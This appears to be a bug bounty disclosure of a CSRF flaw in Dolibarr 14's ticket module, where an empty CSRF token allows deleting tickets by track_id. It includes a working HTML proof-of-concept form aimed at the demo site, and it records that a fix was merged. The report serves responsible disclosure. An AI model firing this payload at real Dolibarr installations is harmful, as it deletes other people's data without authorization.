Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid

Reported on

Jul 21st 2021


✍️ Description

In Ticket section , you protect tickets from being deleted with CSRF attacks but if I set CSRF token to nothings then I able to delete arbitrary tickets only with knowing their "track_id" parameter.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.dolibarr.org/ticket/card.php">
      <input type="hidden" name="track&#95;id" value="2i6ypabzn92v3nt3" />
      <input type="hidden" name="action" value="confirm&#95;delete&#95;ticket" />
      <input type="hidden" name="confirm" value="yes" />
      <input type="hidden" name="token" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of delete mentioned tickets. version of application == 14 (tested on demo website)

We have contacted a member of the dolibarr team and are waiting to hear back a year ago
Laurent Destailleur confirmed that a fix has been merged on 6390f2 a year ago
Laurent Destailleur has been awarded the fix bounty
to join this conversation